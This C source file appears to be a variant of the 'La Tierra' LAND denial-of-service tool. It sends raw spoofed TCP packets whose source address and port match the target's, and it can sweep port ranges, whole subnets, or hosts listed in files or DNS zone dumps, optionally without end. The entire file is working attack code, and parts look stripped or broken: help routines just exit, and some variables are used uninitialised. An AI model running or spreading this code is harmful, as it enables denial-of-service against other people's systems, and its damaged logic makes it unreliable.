#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h> 
#define DEFAULT_FREQUENCY		1 
#define TRUE	 					1
#define FALSE   					0
#define FOR_EVER 					-5
#define LIST_FILE  				1
#define ZONE_FILE  				2
#define MAXLINELENGTH 			512
#define DEFAULT_SEQ				0xF1C
#define DEFAULT_TTL           0xFF
#define DEFAULT_TCPFLAGS      (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE       0xFDE8
struct pseudohdr
	{
   struct in_addr saddr;
   struct in_addr daddr;
   u_char zero;
   u_char protocol;
   u_short length;
   struct tcphdr tcpheader;
	};
typedef struct latierra_data
	{
	char dest_ip[256];
	int  tcp_flags;
	int  window_size;
	int  ip_protocol;
	int  sequence_number;
	int  ttl;
	int  supress_output;
        int  message_type;
	} LATIERRA_DATA;
void alternatives(void);
int  get_ip(int use_file, FILE *fp, char *buff);
int  land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
int main(int argc, char **argv)
{
	FILE *fp;
	LATIERRA_DATA ld;
	int frequency = DEFAULT_FREQUENCY, x;
	int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
	int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
   char got_ip = FALSE, got_beg_port = FALSE;
	char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
	strcpy(valid_tcp_flags, "fsrpau");
	ld.tcp_flags = 0;
	ld.window_size = DEFAULT_WINSIZE;
	ld.ip_protocol = IP_TCP;
	ld.sequence_number = DEFAULT_SEQ;
	ld.ttl = DEFAULT_TTL;
	ld.message_type = 0;
	if(argc > 1 && (!strcmp(argv[1], "-a")))
		alternatives();
	if(argc > 1 && (!strcmp(argv[1], "-n")))
		nslookup_help();
	if(argc > 1 && (!strcmp(argv[1], "-p")))
		protocol_list();
	if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
		print_arguments();
	while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
		{
		switch(i)
			{	
			case 't':
				for(x=0;x<strlen(optarg);x++)
					switch(optarg[x])
						{
						case 'f':                      
							ld.tcp_flags |= TH_FIN;
							break;
						case 's':     
							ld.tcp_flags |= TH_SYN;
							break;
						case 'r':    
							ld.tcp_flags |= TH_RST;
							break;
						case 'p': 
							ld.tcp_flags |= TH_PUSH;			
							break;
						case 'a':       
							ld.tcp_flags |= TH_ACK;
							break;
						case 'u':      
							ld.tcp_flags |= TH_URG;
							break;
						default:
							return(-12);
							break;
						}
				break;
			case 'q':
				ld.sequence_number = atoi(optarg);
				break;
			case 'w':
				ld.window_size = atoi(optarg);
				break;
			case 'm':
				ld.message_type = atoi(optarg);
				break;
			case 'v':
				ld.ttl = atoi(optarg);
				break;
			case 'p':
				ld.ip_protocol = atoi(optarg);
				break;
			case 'o':
				ld.supress_output = TRUE;
				break;
			case 'i':
				if(strlen(optarg) > 1)
					strcpy(ld.dest_ip, optarg);
				else
					{
					return(-6);
					}
				got_ip = TRUE;
				break;
			case 's':
				frequency = atoi(optarg);	
				break;
			case 'l':
				loop = atoi(optarg);
				break;
			case 'b':
				beginning_port = atoi(optarg);
				got_beg_port = TRUE;
				break;
			case 'e':
				ending_port = atoi(optarg);
				break;
			}
		}
	if(!ld.tcp_flags)
		ld.tcp_flags = DEFAULT_TCPFLAGS;
	if(!got_beg_port)
		{
		return(-7);
		}
	if(ending_port == 0)
		ending_port = beginning_port;
	if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
		{
		ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
		strcpy(class_c_addr, ld.dest_ip);
		strcat(ld.dest_ip, "1");
		increment_addr = TRUE;
		octet = 1;
		}
	else
		if(strlen(ld.dest_ip) > 5)
			{
			if(strncmp(ld.dest_ip, "zone=", 5)==0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				use_file = ZONE_FILE;
				}	
			else if(strncmp(ld.dest_ip, "list=", 5) == 0)
				{
				strcpy(filename, &ld.dest_ip[5]);
				use_file = LIST_FILE;
				}
			}
		else
			{
			return(-9);
			}
	strcpy(buff, "");
	if( ld.tcp_flags & TH_FIN)
		strcat(buff, "fin ");
	if( ld.tcp_flags & TH_SYN)
		strcat(buff, "syn ");
	if(ld.tcp_flags & TH_RST)
		strcat(buff, "rst ");
	if(ld.tcp_flags & TH_PUSH)
		strcat(buff, "push ");
	if(ld.tcp_flags & TH_ACK)
		strcat(buff, "ack ");
	if(ld.tcp_flags & TH_URG)
		strcat(buff, "urg ");
	if(ending_port < beginning_port)
		{
		return(-8);
		}
	scan_loop = loop_val = loop;
	if(use_file)
		{
		if(access(filename, 0))
			{
			return(-9);
			}
		if( (fp = fopen(filename, "rt")) == NULL)
			{
			return(-10);
			}
		if(!get_ip(use_file, fp, buff))
			{
			return(-11);
			}
		strcpy(ld.dest_ip, buff);
		}
	while( (loop == FOR_EVER) ? 1 : loop-- > 0)
		{
		for(i=beginning_port; i <= ending_port; i++)
			{
			if(land(&ld, i))   

   		if(frequency)   
			 	{
				if(!ld.supress_output)
				sleep(frequency);
				}
			}
		if( (!use_file) && (loop && increment_addr) )
			{
			char temp_addr[21];
			if(++octet > 254)      
				{
				if(loop_val != FOR_EVER) 
					{
					if(++scan_loop > loop_val)  
						break;
					else
						loop = loop_val;    
					}
				octet = 1;	                    
				}
			strcpy(ld.dest_ip, temp_addr);
			if(!ld.supress_output)
			if(scan_loop > loop_val)
				break;
			}
		else if(use_file)
			{
			if(!get_ip(use_file, fp, buff))
				break;
			loop++;
			strcpy(ld.dest_ip, buff);
			}
		}

}
int  get_ip(int use_file, FILE *fp, char *buff)
{
	if(use_file == LIST_FILE)
		return(get_ip_from_list(fp, buff));
		
	return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
	int ret_val;
	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;
		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '['))
				{
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;

				return 1;
				}
		}
	return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
	int ret_val, i;
	char *p, delim[8];
	strcpy(delim, " \t");
	while(1)
		{
		ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
		if((ret_val == EOF) || (ret_val == (int)NULL))
			return 0;
		if( strlen(buff) >= 7)
			if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
				{
				if( (p = strtok( buff, delim)) == NULL)
					continue;
				if( (p = strtok(NULL, delim)) == NULL)
					continue;
				if(strcmp(p, "A"))
					continue;
				if( (p = strtok(NULL, delim)) == NULL)
					continue;
				strcpy(buff, p);
				if(inet_addr(p) == -1)
					continue;
				if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
					buff[strlen(buff)-1] = 0x0;
				return 1;
				}
		}
	return 0;
}
u_short checksum(u_short * data,u_short length)
{
	register long value;
	u_short i;
	for(i = 0; i< (length >> 1); i++)
		value += data[i];
	if((length & 1)==1)
		value += (data[i] << 8);
	value = (value & 0xFFFF) + (value >> 16);
	return(~value);
}
int land(LATIERRA_DATA *ld,  int port_number)
{
	struct sockaddr_in sin;
   int sock;
   char buffer[40];
   struct iphdr * ipheader = (struct iphdr *) buffer;
   struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
   struct pseudohdr pseudoheader;
	bzero(&sin,sizeof(struct sockaddr_in));
   sin.sin_family=AF_INET;
   if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
   	{
      return(-1);
      }
	if((sin.sin_port=htons(port_number))==0)
  		{
      return(-2);
      }
	if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
   	{
      return(-3);
      }
	bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->version=4;
   ipheader->ihl=sizeof(struct iphdr)/4;
   ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
   ipheader->id=htons(ld->sequence_number);
   ipheader->ttl = ld->ttl;
   ipheader->protocol = ld->ip_protocol;
   ipheader->saddr=sin.sin_addr.s_addr;
   ipheader->daddr=sin.sin_addr.s_addr;
   tcpheader->th_sport = sin.sin_port;
   tcpheader->th_dport = sin.sin_port;
   tcpheader->th_seq = htonl(ld->sequence_number);
   tcpheader->th_flags = ld->tcp_flags;
   tcpheader->th_off = sizeof(struct tcphdr)/4;
   tcpheader->th_win = htons(ld->window_size);
   bzero(&pseudoheader,12+sizeof(struct tcphdr));
   pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
   pseudoheader.protocol = ld->ip_protocol;
   pseudoheader.length = htons(sizeof(struct tcphdr));
   bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
   tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
   if( sendto(sock, 	buffer, 
							sizeof(struct iphdr)+sizeof(struct tcphdr),
							ld->message_type,
							(struct sockaddr *) &sin,
							sizeof(struct sockaddr_in) )==-1)
   	{
      return(-4);
      }
	if(!ld->supress_output)
   close(sock);
   return(0);
}
void alternatives()
{
	exit(-1);
}
void nslookup_help()
{
	exit(-1);
}
void protocol_list()
{
	exit(-1);
}
void print_arguments()
{
	exit(-1);
}
